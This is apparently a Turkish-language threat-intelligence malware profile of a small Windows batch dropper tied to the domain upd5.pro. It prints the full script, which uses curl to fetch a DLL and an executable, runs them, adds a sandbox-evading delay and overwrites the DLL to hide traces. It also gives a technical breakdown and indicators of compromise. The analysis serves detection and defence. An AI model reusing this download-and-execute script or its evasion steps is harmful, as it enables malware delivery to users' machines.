Derin Analiz - Dropper BAT (upd5.pro) | Tehdit: YUKSEK

Dosya Kimligi

SHA2563b3bd81232f517ba6d65c7838c205b301b0f27572fcfef9e5b86dd30a1d55a0d
Boyut326 byte - Sadece 326 bayt! Ultra kompakt dropper
TipDOS BAT script (Windows Batch dosyasi)

Tam Icerik

@echo off\necho "-> Loading update 2..."\ncurl -o 02.dll https://upd5.pro/update/02.dll\nrundll32.exe 02.dll,checkit\necho "-> Loading update 2 tool..."\ncurl -o qd_x86.exe https://upd5.pro/update/qd_x86.exe\nping -n 5 localhost > nul\nqd_x86.exe\ntype c:\Windows\System32\conhost.exe > 02.dll\necho "-> Done."

Teknik Analiz

1. curl ile 02.dll indirilir:\n   https://upd5.pro/update/02.dll\n2. rundll32.exe 02.dll,checkit -> DLL calistirilir (export: checkit)\n3. curl ile qd_x86.exe indirilir:\n   https://upd5.pro/update/qd_x86.exe\n4. ping -n 5 localhost -> 5 saniye bekleme (sandbox atlama)\n5. qd_x86.exe calistirilir\n6. type conhost.exe > 02.dll -> DLL uzerine conhost yazilir (iz silme!)\n\nDomain: upd5.pro -> "update5 pro" = sahte guncelleme sunucusu\nTechnique: LOLBins (curl, rundll32, ping, type - hepsi yerlesik Windows araci)

IOC

SHA2563b3bd81232f517ba6d65c7838c205b301b0f27572fcfef9e5b86dd30a1d55a0d
C2https://upd5.pro/update/02.dll
C2https://upd5.pro/update/qd_x86.exe
Teknikrundll32 LOLBin, trace silme (conhost overwrite)

DropperBAT — Malware Profile

Ultra kompakt (326 byte) BAT dropper. LOLBins kullanir: curl, rundll32, ping, type. upd5.pro sahte guncelleme sunucusundan 02.dll ve qd_x86.exe indirir. Iz silme: conhost.exe ile DLL uzerine yazma.

Malware Type
Loader
Programming Language
Batch
C2 Protocol
HTTPS
Target Systems
Kuresel

Capabilities & Behavior

Payload İndirme
Süreç Enjeksiyonu
Modüler Mimari
Kimlik Bilgisi Hırsızlığı
Yanal Hareket
Kalıcılık
Anti-VM/Sandbox
İkincil Payload Dağıtımı

IOC List (3 indicators)

IOC — DropperBAT
# SHA256 3b3bd81232f517ba6d65c7838c205b301b0f27572fcfef9e5b86dd30a1d55a0d # URL https://upd5.pro/update/02.dll # URL https://upd5.pro/update/qd_x86.exe
TypeValueNote
sha256 3b3bd81232f517ba6d65c7838c205b301b0f27572fcfef9e5b86dd30a1d55a0d
url https://upd5.pro/update/02.dll
url https://upd5.pro/update/qd_x86.exe
Tags
lolbins-dropper-curl-rundll32upd5-pro-fake-update-c2rundll32-02dll-checkit-exportqd-x86exe-payload-downloadping-sandbox-evasion-5secconhost-exe-overwrite-trace-deletion326-byte-ultra-compact-dropperbatch-script-malware-dropper